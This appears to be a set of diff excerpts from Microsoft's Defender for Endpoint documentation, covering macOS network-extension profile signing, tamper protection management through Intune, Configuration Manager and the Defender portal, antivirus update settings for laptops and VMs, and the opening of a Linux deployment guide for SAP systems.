- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender Network Extension</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
- <key>PayloadType</key>
- <string>com.apple.webcontent-filter</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
- <key>PayloadDisplayName</key>
- <string>Approved Network Extension</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>FilterType</key>
- <string>Plugin</string>
- <key>UserDefinedName</key>
- <string>Microsoft Defender Network Extension</string>
- <key>PluginBundleID</key>
- <string>com.microsoft.wdav</string>
- <key>FilterSockets</key>
- <true/>
- <key>FilterDataProviderBundleIdentifier</key>
- <string>com.microsoft.wdav.netext</string>
- <key>FilterDataProviderDesignatedRequirement</key>
- <string>identifier "com.microsoft.wdav.netext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-2. Verify that the above content was copied correctly into the file by running the **plutil** utility in terminal:
-
-```BashCopy
-$ plutil -lint <PathToFile>/com.microsoft.network-extension.mobileconfig
-```
-
-For example, if the file was stored in *Documents*:
-
-```BashCopy
-$ plutil -lint ~/Documents/com.microsoft.network-extension.mobileconfig
-```
-
-3. Verify that the command outputs **OK**
-
-```BashCopy
-<PathToFile>/com.microsoft.network-extension.mobileconfig: OK
-```
-
-4. Follow the instructions on [this page](https://learn.jamf.com/bundle/technical-articles/page/Welcome.html) to create a signing certificate using Jamf's built-in certificate authority.
-
-5. After the certificate is created and installed to your device, run the following command from terminal to sign the file:
-
-```BashCopy
-$ security cms -S -N "<CertificateName>" -i <PathToFile>/com.microsoft.network-extension.mobileconfig -o <PathToSignedFile>/com.microsoft.network-extension.signed.mobileconfig
-```
-
-For example, if the certificate name is *SigningCertificate* and the signed file is going to be stored in *Documents*:
-
-```BashCopy
-$ security cms -S -N "SigningCertificate" -i ~/Documents/com.microsoft.network-extension.mobileconfig -o ~/Documents/com.microsoft.network-extension.signed.mobileconfig
-```
-
-6. From the Jamf portal, navigate to **Configuration Profiles** and select the **Upload** button. Select **com.microsoft.network-extension.signed.mobileconfig** when prompted for the file.
security Manage Tamper Protection Configuration Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-configuration-manager.md
- Title: Manage tamper protection using tenant attach with Configuration Manager, version 2006--
-description: Turn tamper protection on or off using tenant attach with Configuration Manager.
- Previously updated : 09/05/2023------ nextgen-- admindeeplinkDEFENDER---- m365-security-- mde-ngp--
-# Manage tamper protection using tenant attach with Configuration Manager, version 2006
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-- [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)-
-**Platforms**
-- Windows-
-[Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) helps protect certain [security settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on), such as virus and threat protection, from being disabled or changed. If you're part of your organization's security team, and you're using [version 2006 of Configuration Manager](/mem/configmgr/core/plan-design/changes/whats-new-in-version-2006), you can manage tamper protection for devices by using a method called *tenant attach*. Tenant attach enables you to sync your on-premises-only Configuration Manager devices into the Intune admin center, and then deliver endpoint security configuration policies to on-premises collections & devices.
-
-Using Configuration Manager with tenant attach, you can turn tamper protection on (or off) for some or all devices.
-
-> [!IMPORTANT]
-> When tamper protection is turned on, [tamper-protected settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-is-tamper-protection) cannot be changed. To avoid breaking management experiences, including Intune and Configuration Manager, keep in mind that changes to tamper-protected settings might appear to succeed but are actually blocked by tamper protection. Depending on your particular scenario, you have several options available:
-> - If you must make changes to a device and those changes are blocked by tamper protection, use [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device.
-> - Use [Intune](manage-tamper-protection-intune.md) or Configuration Manager to exclude devices from tamper protection.
--
-1. Set up tenant attach. To learn more, see [Get started: Create and deploy endpoint security policies from the admin center](/mem/configmgr/tenant-attach/endpoint-security-get-started).
-
-2. In the [Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Endpoint security** \> **Antivirus**, and then choose **+ Create Policy**.
-
- - In the **Platform** list, select **Windows 10, Windows 11, and Windows Server (ConfigMgr)**.
- - In the **Profile** list, select **Windows Security experience (preview)**.
-
-3. On the **Configuration settings** step, under **Windows Security**, set **Enable tamper protection to prevent Microsoft Defender from being disabled** to **Enabled**.
-
-4. Finish selecting options and settings for your policy.
-
-5. Deploy the policy to your devices.
-
-## See also
--- [Frequently asked questions (FAQs) on tamper protection](faqs-on-tamper-protection.yml)-- [Defender for Endpoint on non-Windows devices](configure-endpoints-non-windows.md)-- [Tech Community Blog: Announcing Tamper Protection for Configuration Manager Tenant Attach clients](https://techcommunity.microsoft.com/t5/microsoft-endpoint-manager-blog/announcing-tamper-protection-for-configuration-manager-tenant/ba-p/1700246#.X3QLR5Ziqq8.linkedin)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)-
security Manage Tamper Protection Individual Device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-individual-device.md
- Title: Manage tamper protection on an individual device--
-description: Turn tamper protection on or off for an individual device.
- Previously updated : 10/24/2023------ nextgen-- admindeeplinkDEFENDER---- m365-security-- tier2-- mde-ngp--
-# Manage tamper protection on an individual device
-
-**Applies to:**
-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-
-**Platforms**
-- Windows-
-[Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) helps protect certain [security settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on), such as virus and threat protection, from being disabled or changed.
-
-If you're a home user, or you aren't subject to settings managed by a security team, you can use the Windows Security app to manage tamper protection on an individual Windows device. You must have appropriate admin permissions on your device to do change security settings, such as tamper protection.
-
-1. On a Windows device, select **Start**, and start typing *Security*. In the search results, select **Windows Security**.
-
-2. Select **Virus & threat protection** \> **Virus & threat protection settings**.
-
-3. Set **Tamper Protection** to **On** or **Off**.
-
-Here's what you see in the Windows Security app:
---
-> [!NOTE]
-> Tamper protection blocks attempts to modify Microsoft Defender Antivirus settings through the registry.
->
-> To help ensure that tamper protection doesn't interfere with non-Microsoft security products or enterprise installation scripts that modify these settings, go to **Windows Security** and update **Security intelligence** to version 1.287.60.0 or later. (See [Security intelligence updates](https://www.microsoft.com/wdsi/definitions).)
->
-> After you've made this update, tamper protection continues to protect your registry settings, and logs attempts to modify them without returning errors.
-
-## See also
--- [Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)-- [Defender for Endpoint on non-Windows devices](configure-endpoints-non-windows.md)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)-
security Manage Tamper Protection Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-intune.md
- Title: Manage tamper protection for your organization using Microsoft Intune--
-description: Turn tamper protection on or off for your organization in Microsoft Intune.
- Previously updated : 10/24/2023------ nextgen-- admindeeplinkDEFENDER---- m365-security-- tier2-- mde-ngp--
-# Manage tamper protection for your organization using Microsoft Intune
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-- [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)-
-**Platforms**
-- Windows-
-Tamper protection helps protect certain [security settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on), such as virus and threat protection, from being disabled or changed. If you're part of your organization's security team, and you're using [Microsoft Intune](/mem/intune/fundamentals/what-is-intune), you can manage tamper protection for your organization in the [Intune admin center](https://endpoint.microsoft.com). Or, you can use [Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection-configure). With Intune or Configuration Manager, you can:
--- [Turn tamper protection on (or off) for some or all devices](#turn-tamper-protection-on-or-off-in-microsoft-intune). -- [Protect Microsoft Defender Antivirus exclusions from tampering](#tamper-protection-for-antivirus-exclusions) (certain requirements must be met).-
-> [!IMPORTANT]
-> If you're using Microsoft Intune to manage Defender for Endpoint settings, make sure to set [DisableLocalAdminMerge](/windows/client-management/mdm/defender-csp#configurationdisablelocaladminmerge) to true on devices.
->
-> When tamper protection is turned on, [tamper-protected settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on) cannot be changed. To avoid breaking management experiences, including Intune (and [Configuration Manager](manage-tamper-protection-configuration-manager.md)), keep in mind that changes to tamper-protected settings might appear to succeed but are actually blocked by tamper protection. Depending on your particular scenario, you have several options available:
-> - If you must make changes to a device and those changes are blocked by tamper protection, we recommend using [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
-> - You can use Intune or [Configuration Manager](manage-tamper-protection-configuration-manager.md) to exclude devices from tamper protection.
-> - If you're managing tamper protection through Intune, you can change [tamper-protected antivirus exclusions](#tamper-protection-for-antivirus-exclusions).
-
-## Requirements for managing tamper protection in Intune
-
-| Requirement | Details |
-|||
-| Roles and permissions | You must have appropriate permissions assigned through roles, such as Global Administrator or Security Administrator. See [Microsoft Entra roles with Intune access](/mem/intune/fundamentals/role-based-access-control#azure-active-directory-roles-with-intune-access). |
-| Device management | Your organization uses [Intune to manage devices](/mem/intune/fundamentals/manage-devices). |
-| Intune licenses | Intune licenses are required. See [Microsoft Intune licensing](/mem/intune/fundamentals/licenses). |
-| Operating System | Windows devices must be running Windows 10 [version 1709 or later](/lifecycle/announcements/revised-end-of-service-windows-10-1709) or Windows 11. (For more information about releases, see [Windows release information](/windows/release-health/release-information).) <br/><br/>For Mac, see [Protect macOS security settings with tamper protection](tamperprotection-macos.md). |
-| Security intelligence | You must be using Windows security with [security intelligence](https://www.microsoft.com/wdsi/definitions) updated to version `1.287.60.0` (or later). |
-| Antimalware platform | Devices must be using antimalware platform version `4.18.1906.3` (or above) and anti-malware engine version `1.1.15500.X` (or later). See [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md). |
-| Microsoft Entra ID | Your Intune and Defender for Endpoint tenants must share the same Microsoft Entra infrastructure. |
-| Defender for Endpoint | Your devices must be onboarded to Defender for Endpoint. |
-
-> [!NOTE]
-> If devices are not enrolled in Microsoft Defender for Endpoint, tamper protection shows up as **Not Applicable** until the onboarding process completes.
-> Tamper protection can prevent changes to security settings from occurring. If you see an error code with Event ID 5013, see [Review event logs and error codes to troubleshoot issues with Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/).
-
-## Turn tamper protection on (or off) in Microsoft Intune
--
-1. In the [Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Endpoint security** \> **Antivirus**, and then choose **+ Create Policy**.
-
- - In the **Platform** list, select **Windows 10, Windows 11, and Windows Server**.
- - In the **Profile** list, select **Windows Security experience**.
-
-2. Create a profile that includes the following setting:
-
- - **TamperProtection (Device): On**
-
-3. Finish selecting options and settings for your policy.
-
-4. Deploy the policy to devices.
-
-## Tamper protection for antivirus exclusions
-
-If your organization has [exclusions defined for Microsoft Defender Antivirus](configure-exclusions-microsoft-defender-antivirus.md), tamper protection protects those exclusions, provided all of the following conditions are met:
-
-| Condition | Criteria |
-|||
-| Microsoft Defender platform | Devices are running Microsoft Defender platform `4.18.2211.5` or later. For more information, see [Monthly platform and engine versions](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions). |
-| `DisableLocalAdminMerge` setting | This setting is also known as preventing local list merging. `DisableLocalAdminMerge` is enabled so that settings configured on a device aren't merged with organization policies, such as settings in Intune. For more information, see [DisableLocalAdminMerge](/windows/client-management/mdm/defender-csp). |
-| Device management | Devices are either managed in Intune only, or are managed with Configuration Manager only. Sense must be enabled. |
-| Antivirus exclusions | Microsoft Defender Antivirus exclusions are managed in Microsoft Intune. For more information, see [Settings for Microsoft Defender Antivirus policy in Microsoft Intune for Windows devices](/mem/intune/protect/antivirus-microsoft-defender-settings-windows). <br/><br/>Functionality to protect Microsoft Defender Antivirus exclusions is enabled on devices. For more information, see [How to determine whether antivirus exclusions are tamper protected on a Windows device](#how-to-determine-whether-antivirus-exclusions-are-tamper-protected-on-a-windows-device). |
-
-> [!TIP]
-> For more detailed information about Microsoft Defender Antivirus exclusions, see [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-## How to determine whether antivirus exclusions are tamper protected on a Windows device
-
-You can use a registry key to determine whether the functionality to protect Microsoft Defender Antivirus exclusions is enabled. The following procedure describes how to view, but not change, tamper protection status.
-
-1. On a Windows device open Registry Editor. (Read-only mode is fine; you're not editing the registry key.)
-
-2. To confirm that the device is managed by Intune only or managed by Configuration Manager only, with Sense enabled, check the following registry key values:
-
- - `ManagedDefenderProductType` (located at `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender` or `HKLM\SOFTWARE\Microsoft\Windows Defender`)
- - `EnrollmentStatus` (located at `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SenseCM` or `HKLM\SOFTWARE\Microsoft\SenseCM`)
-
- The following table summarizes what the registry key values mean:
-
- | `ManagedDefenderProductType` value | `EnrollmentStatus` value | What the value means |
- ||||
- | `6` | (any value) |The device is managed by Intune only. <br/>(*Meets a requirement for exclusions to be tamper protected.*) |
- | `7` | `4` | The device is managed by Configuration Manager. <br/>(*Meets a requirement for exclusions to be tamper protected.*) |
- | A value other than `6` or `7` | (any value) | The device isn't managed by Intune only or Configuration Manager only. <br/>(*Exclusions aren't tamper protected*.) |
-
-3. To confirm that tamper protection is deployed and that exclusions are tamper protected, check the `TPExclusions` registry key (located at `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features` or `HKLM\SOFTWARE\Microsoft\Windows Defender\Features`).
-
- | `TPExclusions` | What the value means |
- |||
- | `1` | The required conditions are met, and the new functionality to protect exclusions is enabled on the device.<br/>(*Exclusions are tamper protected.*) |
- | `0` | Tamper protection isn't currently protecting exclusions on the device.<br/> (*If all the requirements are met and this state seems incorrect, contact support*.) |
-
-> [!CAUTION]
-> **Do not change the value of the registry keys**. Use the preceding procedure for information only. Changing keys has no effect on whether tamper protection applies to exclusions.
-
-## See also
--- [Frequently asked questions (FAQs) on tamper protection](faqs-on-tamper-protection.yml)-- [Defender for Endpoint on non-Windows devices](configure-endpoints-non-windows.md)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)-- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)-
security Manage Tamper Protection Microsoft 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-microsoft-365-defender.md
- Title: Manage tamper protection for your organization using Microsoft Defender XDR--
-description: Turn tamper protection on or off for your tenant using the Microsoft Defender portal.
- Previously updated : 10/24/2023------ nextgen-- admindeeplinkDEFENDER---- m365-security-- tier2-- mde-ngp--
-# Manage tamper protection for your organization using Microsoft Defender portal
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-- [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)-
-**Platforms**
-- Windows-
-[Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) helps protect certain [security settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on), such as virus and threat protection, from being disabled or changed. If you're part of your organization's security team, you can turn tamper protection on (or off) tenant wide by using the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)).
-
-> [!IMPORTANT]
-> If tamper protection is [deployed and managed through Intune](manage-tamper-protection-intune.md), turning tamper protection on or off in the Microsoft Defender portal won't impact the state of tamper protection. It restricts tamper-protected settings to their secure default values. For more information, see [What happens when tamper protection is turned on](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on)?
-
-<a name='requirements-for-managing-tamper-protection-in-the-microsoft-365-defender-portal'></a>
-
-## Requirements for managing tamper protection in the Microsoft Defender portal
--- You must have appropriate permissions assigned through roles, such as Global Administrator or Security Administrator. (See [Microsoft Defender XDR role-based access control (RBAC)](../defender/manage-rbac.md).)--- Devices must be running certain versions of Windows or macOS. (See [On what devices can tamper protection be enabled](prevent-changes-to-security-settings-with-tamper-protection.md#on-what-devices-can-tamper-protection-be-enabled)?)--- Devices must be [onboarded to Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/onboarding).--- Devices must be using anti-malware platform version `4.18.2010.7` (or above) and anti-malware engine version `1.1.17600.5` (or above). ([Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).)--- [Cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md) must be turned on.-
-> [!NOTE]
-> When tamper protection is enabled via the Microsoft Defender portal, [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md) is required so that the enabled state of tamper protection can be controlled. Starting with the November 2021 update (platform version `4.18.2111.5`), if cloud-delivered protection is not already turned on for a device, when tamper protection is turned on, cloud-delivered protection is turned on automatically on the device.
-
-<a name='turn-tamper-protection-on-or-off-in-the-microsoft-365-defender-portal'></a>
-
-## Turn tamper protection on (or off) in the Microsoft Defender portal
--
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Choose **Settings** \> **Endpoints**.
-
-3. Go to **General** \> **Advanced features**, and then turn tamper protection on.
-
-## Important points to keep in mind
--- Currently, the option to manage tamper protection in the Microsoft Defender portal is on by default for new deployments, as part of [built-in protection, which helps guard against ransomware](built-in-protection.md). For existing deployments, tamper protection is available on an opt-in basis. To opt in, in the [Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2077139), choose **Settings** \> **Endpoints** \> **Advanced features** \> **Tamper protection**. --- When you enable tamper protection in the Microsoft Defender portal, the setting is applied tenant wide and restricts [tamper-protected settings](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on) to their secure defaults. Any changes made to tamper-protected settings are ignored. Depending on your particular scenario, you have several options available: -
- - If you must make changes to a device and those changes are blocked by tamper protection, you can use [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device.
-
- - You can use [Intune](manage-tamper-protection-intune.md) or [Configuration Manager](manage-tamper-protection-configuration-manager.md) to exclude devices from tamper protection.
-
- - If you're managing tamper protection through Intune and certain other conditions are met, you can [manage tamper-protected antivirus exclusions](manage-tamper-protection-intune.md#tamper-protection-for-antivirus-exclusions).
-
-## See also
--- [Built-in protection helps guard against ransomware](built-in-protection.md)-- [What happens when tamper protection is turned on?](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on)-- [Defender for Endpoint on non-Windows devices](configure-endpoints-non-windows.md)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)-
security Manage Updates Mobile Devices Vms Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md
- Title: Define how mobile devices are updated by Microsoft Defender Antivirus
-description: Manage how mobile devices, such as laptops, should be updated with Microsoft Defender Antivirus protection updates.
----------- m365-security-- tier2 Previously updated : 04/08/2021--
-# Manage updates for mobile devices and virtual machines (VMs)
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Mobile devices and VMs may require more configuration to ensure performance is not impacted by updates.
-
-There are two settings that are useful for these devices:
--- Opt in to Microsoft Update on mobile computers without a WSUS connection-- Prevent Security intelligence updates when running on battery power-
-The following articles may also be useful in these situations:
-- [Configuring scheduled and catch-up scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md)-- [Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)-- [Deployment guide for Microsoft Defender Antivirus in a virtual desktop infrastructure (VDI) environment](deployment-vdi-microsoft-defender-antivirus.md)-
-## Opt in to Microsoft Update on mobile computers without a WSUS connection
-
-You can use Microsoft Update to keep Security intelligence on mobile devices running Microsoft Defender Antivirus up to date when they are not connected to the corporate network or don't otherwise have a WSUS connection.
-
-This means that protection updates can be delivered to devices (via Microsoft Update) even if you have set WSUS to override Microsoft Update.
-
-You can opt in to Microsoft Update on the mobile device in one of the following ways:
--- Change the setting with Group Policy.-- Use a VBScript to create a script, then run it on each computer in your network.-- Manually opt in every computer on your network through the **Settings** menu.-
-### Use Group Policy to opt in to Microsoft Update
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Signature Updates**.
-
-5. Set **Allow security intelligence updates from Microsoft Update** to **Enabled**, and then select **OK**.
-
-### Use a VBScript to opt in to Microsoft Update
-
-1. Use the instructions in the MSDN article [Opt-In to Microsoft Update](/windows/win32/wua_sdk/opt-in-to-microsoft-update) to create the VBScript.
-
-2. Run the VBScript you created on each computer in your network.
-
-### Manually opt in to Microsoft Update
-
-1. Open **Windows Update** in **Update & security** settings on the computer you want to opt in.
-
-2. Select **Advanced** options.
-
-3. Select the checkbox for **Give me updates for other Microsoft products when I update Windows**.
-
-## Prevent Security intelligence updates when running on battery power
-
-You can configure Microsoft Defender Antivirus to only download protection updates when the PC is connected to a wired power source.
-
-### Use Group Policy to prevent security intelligence updates on battery power
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), choose the Group Policy Object you want to configure, and open it for editing.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Signature Updates**, and then set **Allow security intelligence updates when running on battery power** to **Disabled**. Then select **OK**.
-
-This action prevents protection updates from downloading when the PC is on battery power.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related articles
--- [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Update and manage Microsoft Defender Antivirus in Windows 10](deploy-manage-report-microsoft-defender-antivirus.md)
security Mde Linux Deployment On Sap https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-linux-deployment-on-sap.md
- Title: Deployment guidance for Microsoft Defender for Endpoint on Linux for SAP
-description: Deployment guidance for Microsoft Defender for Endpoint on Linux for SAP
-------- m365-security-- tier3-- mde-linux-- Previously updated : 04/17/2024--- partner-contribution--
-# Deployment guidance for Microsoft Defender for Endpoint on Linux for SAP
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article provides deployment guidance for Microsoft Defender for Endpoint on Linux for SAP. This article includes recommended SAP OSS (Online Services System) notes, the system requirements, prerequisites, important configuration settings, recommended antivirus exclusions, and guidance on scheduling antivirus scans.
-
-Conventional security defenses that have been commonly used to protect SAP systems such as isolating infrastructure behind firewalls and limiting interactive operating system logons are no longer considered sufficient to mitigate modern sophisticated threats. It's essential to deploy modern defenses to detect and contain threats in real-time. SAP applications unlike most other workloads require basic assessment and validation before deploying Microsoft Defender for Endpoint. The enterprise security administrators should contact the SAP Basis team prior to deploying Defender for Endpoint. The SAP Basis Team should be cross trained with a basic level of knowledge about Defender for Endpoint.
-
-## Recommended SAP OSS Notes
--- [2248916 - Which files and directories should be excluded from an antivirus scan for SAP BusinessObjects Business Intelligence Platform products in Linux/Unix? - SAP ONE Support Launchpad](https://launchpad.support.sap.com/#/notes/2248916)-- [1984459 - Which files and directories should be excluded from an antivirus scan for SAP Data Services - SAP ONE Support Launchpad](https://launchpad.support.sap.com/#/notes/1984459)-- [2808515 - Installing security software on SAP servers running on Linux - SAP ONE Support Launchpad](https://launchpad.support.sap.com/#/notes/2808515)-- [1730930 - Using antivirus software in an SAP HANA appliance - SAP ONE Support Launchpad](https://launchpad.support.sap.com/#/notes/1730930)-- [1730997 - Unrecommended versions of antivirus software - SAP ONE Support Launchpad](https://launchpad.support.sap.com/#/notes/1730997)-
-## SAP Applications on Linux
--- SAP only supports Suse, Redhat, and Oracle Linux. Other distributions aren't supported for SAP S4 or NetWeaver applications.-- Suse 15.x, Redhat 8.x or 9.x and Oracle Linux 8.x are strongly recommended.-- Suse 12.x, Redhat 7.x and Oracle Linux 7.x are technically supported but weren't extensively tested.-- Suse 11.x, Redhat 6.x and Oracle Linux 6.x might not be supported and weren't tested.-- Suse and Redhat offer tailored distributions for SAP. These "for SAP" versions of Suse and Redhat might have different packages preinstalled and possibly different kernels.-- SAP only supports certain Linux File systems. In general, XFS and EXT3 are used. Oracle Automatic Storage Management (ASM) filesystem is sometimes used for Oracle DBMS and can't be read by Defender for Endpoint.-- Some SAP applications use "standalone engines" such as TREX, Adobe Document Server, Content Server and LiveCache. These engines require specific configuration and file exclusions.-- SAP applications often have Transport and Interface directories with many thousands of small files. If the number of files is larger than 100,000, it might and affect performance. It's recommended to archive files.-- It's strongly recommended to deploy Defender for Endpoint to nonproductive SAP landscapes for several weeks before deploying to production. The SAP Basis Team should use tools such as sysstat, KSAR, and nmon to verify if CPU and other performance parameters are impacted.-
-## Prerequisites for deploying Microsoft Defender for Endpoint on Linux on SAP VMs
--- Microsoft Defender for Endpoint [version](./linux-whatsnew.md) >= 101.23082.0009 | Release version: 30.123082.0009 or higher must be deployed.-- Microsoft Defender for Endpoint on Linux supports all the [Linux releases](microsoft-defender-endpoint-linux.md#system-requirements) used by SAP applications.-- Microsoft Defender for Endpoint on Linux requires connectivity to [specific Internet endpoints](microsoft-defender-endpoint-linux.md#network-connections) from VMs to update antivirus Definitions.-- Microsoft Defender for Endpoint on Linux requires some crontab (or other task scheduler) entries to schedule scans, log rotation, and Microsoft Defender for Endpoint updates. Enterprise Security teams normally manage these entries. Refer to [How to schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-mde-linux.md).-
-The default configuration option for deployment as an Azure Extension for AntiVirus (AV) will be Passive Mode. This means that the AV component of Microsoft Defender for Endpoint won't intercept IO calls. It's recommended to run Microsoft Defender for Endpoint in Passive Mode on all SAP applications and to schedule a scan once per day. In this mode:
--- **Real-time protection is turned off**: Threats aren't remediated by Microsoft Defender Antivirus.-- **On-demand scanning is turned on**: Still use the scan capabilities on the endpoint.-- **Automatic threat remediation is turned off**: No files are moved and the security administrator is expected to take required action.-- **Security intelligence updates are turned on**: Alerts are available on security administrator's tenant.-
-The Linux crontab is typically used to schedule Microsoft Defender for Endpoint AV scan and log rotation tasks:
-[How to schedule scans with Microsoft Defender for Endpoint (Linux)](linux-schedule-scan-mde.md)
-
